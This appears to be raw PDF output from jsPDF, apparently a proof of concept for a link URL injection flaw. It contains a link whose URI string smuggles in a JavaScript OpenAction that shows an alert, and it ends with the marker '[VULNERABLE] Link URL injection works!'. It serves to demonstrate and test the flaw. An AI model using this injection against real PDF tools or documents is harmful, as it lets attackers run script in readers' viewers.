%PDF-1.3 %ºß¬à 3 0 obj <> /OpenAction << /S /JavaScript /JS \(app.alert\('link'\)\) >> /URI \(http://test.com) >> >> ] /Contents 4 0 R >> endobj 4 0 obj << /Length 222 >> stream 0.5670000000000001 w 0 G BT /F1 16 Tf 18.3999999999999986 TL 0 g 28.3464566929133888 813.5435433070865656 Td (Test) Tj ET BT /F1 16 Tf 18.3999999999999986 TL 0 g 28.3464566929133888 785.1970866141732586 Td (Click me) Tj ET endstream endobj 1 0 obj <> endobj 5 0 obj << /Type /Font /BaseFont /Helvetica /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 6 0 obj << /Type /Font /BaseFont /Helvetica-Bold /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 7 0 obj << /Type /Font /BaseFont /Helvetica-Oblique /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 8 0 obj << /Type /Font /BaseFont /Helvetica-BoldOblique /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 9 0 obj << /Type /Font /BaseFont /Courier /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 10 0 obj << /Type /Font /BaseFont /Courier-Bold /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 11 0 obj << /Type /Font /BaseFont /Courier-Oblique /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 12 0 obj << /Type /Font /BaseFont /Courier-BoldOblique /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 13 0 obj << /Type /Font /BaseFont /Times-Roman /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 14 0 obj << /Type /Font /BaseFont /Times-Bold /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 15 0 obj << /Type /Font /BaseFont /Times-Italic /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 16 0 obj << /Type /Font /BaseFont /Times-BoldItalic /Subtype /Type1 /Encoding /WinAnsiEncoding /FirstChar 32 /LastChar 255 >> endobj 17 0 obj << /Type /Font /BaseFont /ZapfDingbats /Subtype /Type1 /FirstChar 32 /LastChar 255 >> endobj 18 0 obj << /Type /Font /BaseFont /Symbol /Subtype /Type1 /FirstChar 32 /LastChar 255 >> endobj 2 0 obj << /ProcSet [/PDF /Text /ImageB /ImageC /ImageI] /Font << /F1 5 0 R /F2 6 0 R /F3 7 0 R /F4 8 0 R /F5 9 0 R /F6 10 0 R /F7 11 0 R /F8 12 0 R /F9 13 0 R /F10 14 0 R /F11 15 0 R /F12 16 0 R /F13 17 0 R /F14 18 0 R >> /XObject << >> >> endobj 19 0 obj << /Producer (jsPDF 4.1.0) /CreationDate (D:20260219205533-00'00') >> endobj 20 0 obj << /Type /Catalog /Pages 1 0 R /OpenAction [3 0 R /FitH null] /PageLayout /OneColumn >> endobj xref 0 21 0000000000 65535 f 0000000689 00000 n 0000002506 00000 n 0000000015 00000 n 0000000416 00000 n 0000000746 00000 n 0000000871 00000 n 0000001001 00000 n 0000001134 00000 n 0000001271 00000 n 0000001394 00000 n 0000001523 00000 n 0000001655 00000 n 0000001791 00000 n 0000001919 00000 n 0000002046 00000 n 0000002175 00000 n 0000002308 00000 n 0000002410 00000 n 0000002754 00000 n 0000002840 00000 n trailer << /Size 21 /Root 20 0 R /Info 19 0 R /ID [ <4F6342DE2635C2B4A33D51DC4A639337> <4F6342DE2635C2B4A33D51DC4A639337> ] >> startxref 2944 %%EOF [VULNERABLE] Link URL injection works!